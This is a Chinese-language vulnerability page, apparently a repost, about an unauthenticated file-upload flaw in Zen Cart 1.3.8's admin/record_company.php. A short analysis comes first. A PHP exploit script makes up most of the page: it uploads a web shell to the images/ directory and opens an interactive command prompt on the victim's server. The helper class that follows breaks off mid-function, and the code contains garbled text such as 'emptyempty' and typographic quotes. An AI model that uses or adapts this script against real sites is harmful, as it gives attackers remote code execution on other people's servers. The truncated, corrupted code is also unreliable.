影响版本:
Zen Cart 1.3.8
程序介绍:
Zen Cart是一款免费开源的购物车软件。
漏洞分析:
Zen Cart没有对admin/record_company.php模块强制管理认证,远程攻击者可以通过record_company_image和PATH_INFO参数上传.php文件,并通过直接请求images/中的文件来访问上传的文件,导致执行任意指令。
漏洞利用:
- #!/usr/bin/php
- <?php
- #
- # ——- Zen Cart 1.3.8 Remote Code Execution
- # http://www.zen-cart.com/
- # Zen Cart Ecommerce – putting the dream of server rooting within reach of anyone!
- # A new version (1.3.8a) is avaible on http://www.zen-cart.com/
- #
- # BlackH 🙂
- #
- error_reporting(E_ALL ^ E_NOTICE);
- if($argc < 2)
- {
- echo "
- =___________ Zen Cart 1.3.8 Remote Code Execution Exploit ____________=
- ========================================================================
- | BlackH <Bl4ck.H@gmail.com> |
- ========================================================================
- | |
- | \$system> php $argv[0] <url> |
- | Notes: <url> ex: http://victim.com/site (no slash) |
- | |
- ========================================================================
- ";exit(1);
- }
- $url = $argv[1];
- $trick = "/password_forgotten.php";
- $xpl = new phpsploit();
- $xpl->agent("Mozilla Firefox");
- $real_kthxbye = remote_exec($url);
- # Remote Code Execution Exploit
- function remote_exec($url) {
- global $xpl, $url, $trick;
- echo "\n[-] Remote Code Execution";
- if(!$xpl->get($url.‘/admin/’)) die("\n[!] error – the /admin/ directory is protected or don’t exist.\n");
- $n = substr(md5(rand(0, 1337)), 0, 5).".php"; # random php file
- $code = ‘<?php system($_SERVER["HTTP_SHELL"]); ?>’;
- $form = array(frmdt_url => $url."/admin/record_company.php".$trick."?action=insert",
- "record_company_name" => "0",
- "record_company_image" => array(frmdt_type => "tgreal/suce", # it works ! o_O
- frmdt_filename => $n,
- frmdt_content => $code));
- if($xpl->formdata($form)) echo "\n[!] Done – Start Shell: ".$n;
- else die("\n[!] error – can’t upload the shell\n");
- print "\nrce@jah\$> ";
- while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))){
- $xpl->addheader(‘SHELL’,$cmd);
- $xpl->get($url.‘/images/’.$n);
- print $xpl->getcontent()."\nrce@jah$> ";
- # don’t forget to "rm *.php" and exit
- # you can use "Zen Cart 1.3.8 Remote SQL Execution Exploit"
- # to clean the database (record_company & record_company_info)
- }
- }
- class phpsploit
- {
- var $proxyhost;
- var $proxyport;
- var $host;
- var $path;
- var $port;
- var $method;
- var $url;
- var $packet;
- var $proxyuser;
- var $proxypass;
- var $header;
- var $cookie;
- var $data;
- var $boundary;
- var $allowredirection;
- var $last_redirection;
- var $cookiejar;
- var $recv;
- var $cookie_str;
- var $header_str;
- var $server_content;
- var $server_header;
- /**
- * This function is called by the
- * get()/post()/formdata() functions.
- * You don’t have to call it, this is
- * the main function.
- *
- * @access private
- * @return string $this->recv ServerResponse
- *
- */
- function sock()
- {
- if(!emptyempty($this->proxyhost) && !emptyempty($this->proxyport))
- $socket = @fsockopen($this->proxyhost,$this->proxyport);
- else
- $socket = @fsockopen($this->host,$this->port);
- if(!$socket)
- die("Error: Host seems down");
- if($this->method==‘get’)
- $this->packet = ‘GET ‘.$this->url." HTTP/1.1\r\n";
- elseif($this->method==‘post’ or $this->method==‘formdata’)
- $this->packet = ‘POST ‘.$this->url." HTTP/1.1\r\n";
- else
- die("Error: Invalid method");
- if(!emptyempty($this->proxyuser))
- $this->packet .= ‘Proxy-Authorization: Basic ‘.base64_encode($this->proxyuser.‘:’.$this->proxypass)."\r\n";
- if(!emptyempty($this->header))
- $this->packet .= $this->showheader();
- if(!emptyempty($this->cookie))
- $this->packet .= ‘Cookie: ‘.$this->showcookie()."\r\n";
- $this->packet .= ‘Host: ‘.$this->host."\r\n";
- $this->packet .= "Connection: Close\r\n";
- if($this->method==‘post’)
- {
- $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
- $this->packet .= ‘Content-Length: ‘.strlen($this->data)."\r\n\r\n";
- $this->packet .= $this->data."\r\n";
- }
- elseif($this->method==‘formdata’)
- {
- $this->packet .= ‘Content-Type: multipart/form-data; boundary=’.str_repeat(‘-‘,27).$this->boundary."\r\n";
- $this->packet .= ‘Content-Length: ‘.strlen($this->data)."\r\n\r\n";
- $this->packet .= $this->data;
- }
- $this->packet .= "\r\n";
- $this->recv = ”;
- fputs($socket,$this->packet);
- while(!feof($socket))
- $this->recv .= fgets($socket);
- fclose($socket);
- if($this->cookiejar)
- $this->getcookie();
- if($this->allowredirection)
- return $this->getredirection();
- else
- return $this->recv;
- }
- /**
- * This function allows you to add several
- * cookies in the request.
- *
- * @access public
- * @param string cookn CookieName
- * @param string cookv CookieValue
- * @example $this->addcookie(‘name’,’value’)
- *
- */
- function addcookie($cookn,$cookv)
- {
- if(!isset($this->cookie))
- $this->cookie = array();
- $this->cookie[$cookn] = $cookv;
- }
- /**
- * This function allows you to add several
- * headers in the request.
- *
- * @access public
- * @param string headern HeaderName
- * @param string headervalue Headervalue
- * @example $this->addheader(‘Client-IP’, ‘128.5.2.3’)
- *
- */
- function addheader($headern,$headervalue)
- {
- if(!isset($this->header))
- $this->header = array();
- $this->header[$headern] = $headervalue;
- }
- /**
- * This function allows you to use an
- * http proxy server. Several methods
- * are supported.
- *
- * @access public
- * @param string proxy ProxyHost
- * @param integer proxyp ProxyPort
- * @example $this->proxy(‘localhost’,8118)
- * @example $this->proxy(‘localhost:8118’)
- *
- */
- function proxy($proxy,$proxyp=”)
- {
- if(emptyempty($proxyp))
- {
- $proxarr = explode(‘:’,$proxy);
- $this->proxyhost = $proxarr[0];
- $this->proxyport = (int)$proxarr[1];
- }
- else
- {
- $this->proxyhost = $proxy;
- $this->proxyport = (int)$proxyp;
- }
- if($this->proxyport > 65535)
- die("Error: Invalid port number");
- }
- /**
- * This function allows you to use an
- * http proxy server which requires a
- * basic authentification. Several
- * methods are supported:
- *
- * @access public
- * @param string proxyauth ProxyUser
- * @param string proxypass ProxyPass
- * @example $this->proxyauth(‘user’,’pwd’)
- * @example $this->proxyauth(‘user:pwd’);
- *
- */
- function proxyauth($proxyauth,$proxypass=”)
- {
- if(emptyempty($proxypass))
- {
- $posvirg = strpos($proxyauth,‘:’);
- $this->proxyuser = substr($proxyauth,0,$posvirg);
- $this->proxypass = substr($proxyauth,$posvirg+1);
- }
- else
- {
- $this->proxyuser = $proxyauth;
- $this->proxypass = $proxypass;
- }
- }
- /**
- * This function allows you to set
- * the ‘User-Agent’ header.
- *
- * @access public
- * @param string useragent Agent
- * @example $this->agent(‘Firefox’)
- *
- */
- function agent($useragent)
- {
- $this->addheader(‘User-Agent’,$useragent);
- }
- /**
- * This function returns the headers
- * which will be in the next request.
- *
- * @access public
- * @return string $this->header_str Headers
- * @example $this->showheader()
- *
- */
- function showheader()
- {
- $this->header_str = ”;
- if(!isset($this->header))
- return;
- foreach($this->header as $name => $value)
- $this->header_str .= $name.‘: ‘.$value."\r\n";
- return $this->header_str;
- }
- /**
- * This function returns the cookies
- * which will be in the next request.
- *
- * @access public
- * @return string $this->cookie_str Cookies
- * @example $this->showcookie()
- *
- */
- function showcookie()
- {
- $this->cookie_str = ”;
- if(!isset($this->cookie))
- return;
- foreach($this->cookie as $name => $value)
- $this->cookie_str .= $name.‘=’.$value.‘; ‘;
- return $this->cookie_str;
- }
- /**
- * This function returns the last
- * formed http request.
- *
- * @access public
- * @return string $this->packet HttpPacket
- * @example $this->showlastrequest()
- *
- */
- function showlastrequest()
- {
- if(!isset($this->packet))
- return;
- else
- return $this->packet;
- }
- /**
- * This function sends the formed
- * http packet with the GET method.
- *
- * @access public
- * @param string url Url
- * @return string $this->sock()
- * @example $this->get(‘localhost/index.php?var=x’)
- * @example $this->get(‘http://localhost:88/tst.php’)
- *
- */
- function get(
0 条评论。